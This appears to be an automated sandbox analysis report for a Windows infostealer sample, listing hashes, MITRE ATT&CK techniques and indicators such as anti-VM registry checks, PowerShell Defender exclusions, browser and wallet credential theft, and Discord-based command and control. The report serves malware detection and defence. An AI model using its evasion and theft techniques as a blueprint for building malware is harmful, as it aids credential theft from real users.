6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
06-01-2025 02:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
Size

8.7MB
MD5

41b147fd16a94a8ea6164177cf91733c
SHA1

f586388782d636b286ef606de997087f451fe11f
SHA256

6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31
SHA512

c15b8cc463186471a12431131d90733f9389d2eded969ee056b1bfe391ab255fc88c4f1b896e05dc6d4f94cba82bf066316fca489047781e13ddfd522e9e5da0
SSDEEP

196608:lPWgT2X83i4bCFRu3TN9hoy6Enwc4GgpG0REtHIrq7L3mrbW3jmy+:lDKXe0c3jWyotGgpGLtz7bmrbmyJ

Score

9^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer themida trojan upx

Malware Config

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2584	powershell.exe
716	powershell.exe
2740	powershell.exe
2904	powershell.exe
2936	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe

ACProtect 1.3x - 1.4x DLL software 16 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x000a000000023ba1-27.dat	acprotect
behavioral2/files/0x000a000000023b94-33.dat	acprotect
behavioral2/files/0x000a000000023b9b-54.dat	acprotect
behavioral2/files/0x000a000000023b9a-53.dat	acprotect
behavioral2/files/0x000a000000023b99-52.dat	acprotect
behavioral2/files/0x000a000000023b98-51.dat	acprotect
behavioral2/files/0x000a000000023b97-50.dat	acprotect
behavioral2/files/0x000a000000023b96-49.dat	acprotect
behavioral2/files/0x000a000000023b95-48.dat	acprotect
behavioral2/files/0x000a000000023b93-47.dat	acprotect
behavioral2/files/0x000a000000023ba6-46.dat	acprotect
behavioral2/files/0x000a000000023ba5-45.dat	acprotect
behavioral2/files/0x000a000000023ba4-44.dat	acprotect
behavioral2/files/0x000a000000023ba0-41.dat	acprotect
behavioral2/files/0x000a000000023b9e-40.dat	acprotect
behavioral2/files/0x000a000000023b9f-37.dat	acprotect

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1924	cmd.exe
4404	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2652	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Themida packer 10 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/memory/3972-0-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/3972-2-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/3972-3-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/2640-26-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/2640-25-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/2640-72-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/3972-66-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/3972-326-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/2640-381-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/3972-407-0x0000000000400000-0x0000000000B47000-memory.dmp	themida

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
27	discord.com
26	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com
24	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
880	tasklist.exe
2588	tasklist.exe
3620	tasklist.exe
2776	tasklist.exe
1436	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5064	cmd.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
3972	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023ba1-27.dat	upx
behavioral2/memory/2640-30-0x0000000075220000-0x000000007572B000-memory.dmp	upx
behavioral2/files/0x000a000000023b94-33.dat	upx
behavioral2/files/0x000a000000023b9b-54.dat	upx
behavioral2/files/0x000a000000023b9a-53.dat	upx
behavioral2/files/0x000a000000023b99-52.dat	upx
behavioral2/files/0x000a000000023b98-51.dat	upx
behavioral2/files/0x000a000000023b97-50.dat	upx
behavioral2/files/0x000a000000023b96-49.dat	upx
behavioral2/files/0x000a000000023b95-48.dat	upx
behavioral2/files/0x000a000000023b93-47.dat	upx
behavioral2/files/0x000a000000023ba6-46.dat	upx
behavioral2/files/0x000a000000023ba5-45.dat	upx
behavioral2/files/0x000a000000023ba4-44.dat	upx
behavioral2/files/0x000a000000023ba0-41.dat	upx
behavioral2/files/0x000a000000023b9e-40.dat	upx
behavioral2/memory/2640-38-0x00000000751C0000-0x00000000751CD000-memory.dmp	upx
behavioral2/files/0x000a000000023b9f-37.dat	upx
behavioral2/memory/2640-36-0x00000000751D0000-0x00000000751EF000-memory.dmp	upx
behavioral2/memory/2640-60-0x0000000075190000-0x00000000751B7000-memory.dmp	upx
behavioral2/memory/2640-62-0x0000000075170000-0x0000000075188000-memory.dmp	upx
behavioral2/memory/2640-64-0x0000000075150000-0x000000007516B000-memory.dmp	upx
behavioral2/memory/2640-67-0x0000000075010000-0x0000000075147000-memory.dmp	upx
behavioral2/memory/2640-69-0x0000000074FF0000-0x0000000075006000-memory.dmp	upx
behavioral2/memory/2640-74-0x0000000074F70000-0x0000000074F98000-memory.dmp	upx
behavioral2/memory/2640-73-0x0000000074FA0000-0x0000000074FAC000-memory.dmp	upx
behavioral2/memory/2640-82-0x00000000751D0000-0x00000000751EF000-memory.dmp	upx
behavioral2/memory/2640-80-0x0000000074C70000-0x0000000074ECA000-memory.dmp	upx
behavioral2/memory/2640-79-0x0000000074ED0000-0x0000000074F64000-memory.dmp	upx
behavioral2/memory/2640-78-0x0000000075220000-0x000000007572B000-memory.dmp	upx
behavioral2/memory/2640-84-0x0000000074C00000-0x0000000074C10000-memory.dmp	upx
behavioral2/memory/2640-87-0x0000000074BF0000-0x0000000074BFC000-memory.dmp	upx
behavioral2/memory/2640-86-0x0000000075190000-0x00000000751B7000-memory.dmp	upx
behavioral2/memory/2640-89-0x0000000075170000-0x0000000075188000-memory.dmp	upx
behavioral2/memory/2640-90-0x0000000074AC0000-0x0000000074BD9000-memory.dmp	upx
behavioral2/memory/2640-115-0x0000000075150000-0x000000007516B000-memory.dmp	upx
behavioral2/memory/2640-161-0x0000000074FF0000-0x0000000075006000-memory.dmp	upx
behavioral2/memory/2640-231-0x0000000074F70000-0x0000000074F98000-memory.dmp	upx
behavioral2/memory/2640-247-0x0000000074ED0000-0x0000000074F64000-memory.dmp	upx
behavioral2/memory/2640-251-0x0000000074C70000-0x0000000074ECA000-memory.dmp	upx
behavioral2/memory/2640-342-0x0000000074AC0000-0x0000000074BD9000-memory.dmp	upx
behavioral2/memory/2640-334-0x0000000075010000-0x0000000075147000-memory.dmp	upx
behavioral2/memory/2640-329-0x00000000751D0000-0x00000000751EF000-memory.dmp	upx
behavioral2/memory/2640-328-0x0000000075220000-0x000000007572B000-memory.dmp	upx
behavioral2/memory/2640-397-0x0000000074F70000-0x0000000074F98000-memory.dmp	upx
behavioral2/memory/2640-396-0x0000000074AC0000-0x0000000074BD9000-memory.dmp	upx
behavioral2/memory/2640-406-0x0000000074FA0000-0x0000000074FAC000-memory.dmp	upx
behavioral2/memory/2640-405-0x0000000074FF0000-0x0000000075006000-memory.dmp	upx
behavioral2/memory/2640-404-0x0000000075010000-0x0000000075147000-memory.dmp	upx
behavioral2/memory/2640-403-0x0000000075150000-0x000000007516B000-memory.dmp	upx
behavioral2/memory/2640-402-0x0000000075170000-0x0000000075188000-memory.dmp	upx
behavioral2/memory/2640-401-0x0000000075190000-0x00000000751B7000-memory.dmp	upx
behavioral2/memory/2640-400-0x00000000751C0000-0x00000000751CD000-memory.dmp	upx
behavioral2/memory/2640-399-0x00000000751D0000-0x00000000751EF000-memory.dmp	upx
behavioral2/memory/2640-398-0x0000000075220000-0x000000007572B000-memory.dmp	upx
behavioral2/memory/2640-395-0x0000000074BF0000-0x0000000074BFC000-memory.dmp	upx
behavioral2/memory/2640-394-0x0000000074C00000-0x0000000074C10000-memory.dmp	upx
behavioral2/memory/2640-393-0x0000000074C70000-0x0000000074ECA000-memory.dmp	upx
behavioral2/memory/2640-392-0x0000000074ED0000-0x0000000074F64000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	systeminfo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4504	cmd.exe
4188	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
392	cmd.exe
3460	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3540	WMIC.exe
4656	WMIC.exe
1888	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3344	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4188	PING.EXE

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
3972	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
3972	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
2904	powershell.exe
716	powershell.exe
716	powershell.exe
2904	powershell.exe
2584	powershell.exe
2584	powershell.exe
2584	powershell.exe
4404	powershell.exe
4404	powershell.exe
4620	powershell.exe
4620	powershell.exe
4404	powershell.exe
4620	powershell.exe
2936	powershell.exe
2936	powershell.exe
4384	powershell.exe
4384	powershell.exe
2740	powershell.exe
2740	powershell.exe
916	powershell.exe
916	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1752	WMIC.exe
Token: SeSecurityPrivilege	1752	WMIC.exe
Token: SeTakeOwnershipPrivilege	1752	WMIC.exe
Token: SeLoadDriverPrivilege	1752	WMIC.exe
Token: SeSystemProfilePrivilege	1752	WMIC.exe
Token: SeSystemtimePrivilege	1752	WMIC.exe
Token: SeProfSingleProcessPrivilege	1752	WMIC.exe
Token: SeIncBasePriorityPrivilege	1752	WMIC.exe
Token: SeCreatePagefilePrivilege	1752	WMIC.exe
Token: SeBackupPrivilege	1752	WMIC.exe
Token: SeRestorePrivilege	1752	WMIC.exe
Token: SeShutdownPrivilege	1752	WMIC.exe
Token: SeDebugPrivilege	1752	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1752	WMIC.exe
Token: SeRemoteShutdownPrivilege	1752	WMIC.exe
Token: SeUndockPrivilege	1752	WMIC.exe
Token: SeManageVolumePrivilege	1752	WMIC.exe
Token: 33	1752	WMIC.exe
Token: 34	1752	WMIC.exe
Token: 35	1752	WMIC.exe
Token: 36	1752	WMIC.exe
Token: SeDebugPrivilege	880	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1752	WMIC.exe
Token: SeSecurityPrivilege	1752	WMIC.exe
Token: SeTakeOwnershipPrivilege	1752	WMIC.exe
Token: SeLoadDriverPrivilege	1752	WMIC.exe
Token: SeSystemProfilePrivilege	1752	WMIC.exe
Token: SeSystemtimePrivilege	1752	WMIC.exe
Token: SeProfSingleProcessPrivilege	1752	WMIC.exe
Token: SeIncBasePriorityPrivilege	1752	WMIC.exe
Token: SeCreatePagefilePrivilege	1752	WMIC.exe
Token: SeBackupPrivilege	1752	WMIC.exe
Token: SeRestorePrivilege	1752	WMIC.exe
Token: SeShutdownPrivilege	1752	WMIC.exe
Token: SeDebugPrivilege	1752	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1752	WMIC.exe
Token: SeRemoteShutdownPrivilege	1752	WMIC.exe
Token: SeUndockPrivilege	1752	WMIC.exe
Token: SeManageVolumePrivilege	1752	WMIC.exe
Token: 33	1752	WMIC.exe
Token: 34	1752	WMIC.exe
Token: 35	1752	WMIC.exe
Token: 36	1752	WMIC.exe
Token: SeDebugPrivilege	716	powershell.exe
Token: SeDebugPrivilege	2904	powershell.exe
Token: SeIncreaseQuotaPrivilege	3540	WMIC.exe
Token: SeSecurityPrivilege	3540	WMIC.exe
Token: SeTakeOwnershipPrivilege	3540	WMIC.exe
Token: SeLoadDriverPrivilege	3540	WMIC.exe
Token: SeSystemProfilePrivilege	3540	WMIC.exe
Token: SeSystemtimePrivilege	3540	WMIC.exe
Token: SeProfSingleProcessPrivilege	3540	WMIC.exe
Token: SeIncBasePriorityPrivilege	3540	WMIC.exe
Token: SeCreatePagefilePrivilege	3540	WMIC.exe
Token: SeBackupPrivilege	3540	WMIC.exe
Token: SeRestorePrivilege	3540	WMIC.exe
Token: SeShutdownPrivilege	3540	WMIC.exe
Token: SeDebugPrivilege	3540	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3540	WMIC.exe
Token: SeRemoteShutdownPrivilege	3540	WMIC.exe
Token: SeUndockPrivilege	3540	WMIC.exe
Token: SeManageVolumePrivilege	3540	WMIC.exe
Token: 33	3540	WMIC.exe
Token: 34	3540	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3972 wrote to memory of 2640	3972	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	82
PID 3972 wrote to memory of 2640	3972	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	82
PID 3972 wrote to memory of 2640	3972	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	82
PID 2640 wrote to memory of 2024	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	83
PID 2640 wrote to memory of 2024	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	83
PID 2640 wrote to memory of 2024	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	83
PID 2640 wrote to memory of 4988	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	84
PID 2640 wrote to memory of 4988	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	84
PID 2640 wrote to memory of 4988	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	84
PID 2640 wrote to memory of 2656	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	85
PID 2640 wrote to memory of 2656	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	85
PID 2640 wrote to memory of 2656	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	85
PID 2640 wrote to memory of 3932	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	86
PID 2640 wrote to memory of 3932	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	86
PID 2640 wrote to memory of 3932	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	86
PID 2640 wrote to memory of 4820	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	91
PID 2640 wrote to memory of 4820	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	91
PID 2640 wrote to memory of 4820	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	91
PID 2024 wrote to memory of 716	2024	cmd.exe	93
PID 2024 wrote to memory of 716	2024	cmd.exe	93
PID 2024 wrote to memory of 716	2024	cmd.exe	93
PID 3932 wrote to memory of 880	3932	cmd.exe	94
PID 3932 wrote to memory of 880	3932	cmd.exe	94
PID 3932 wrote to memory of 880	3932	cmd.exe	94
PID 4988 wrote to memory of 2904	4988	cmd.exe	95
PID 4988 wrote to memory of 2904	4988	cmd.exe	95
PID 4988 wrote to memory of 2904	4988	cmd.exe	95
PID 2656 wrote to memory of 32	2656	cmd.exe	96
PID 2656 wrote to memory of 32	2656	cmd.exe	96
PID 2656 wrote to memory of 32	2656	cmd.exe	96
PID 4820 wrote to memory of 1752	4820	cmd.exe	97
PID 4820 wrote to memory of 1752	4820	cmd.exe	97
PID 4820 wrote to memory of 1752	4820	cmd.exe	97
PID 2640 wrote to memory of 2980	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	99
PID 2640 wrote to memory of 2980	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	99
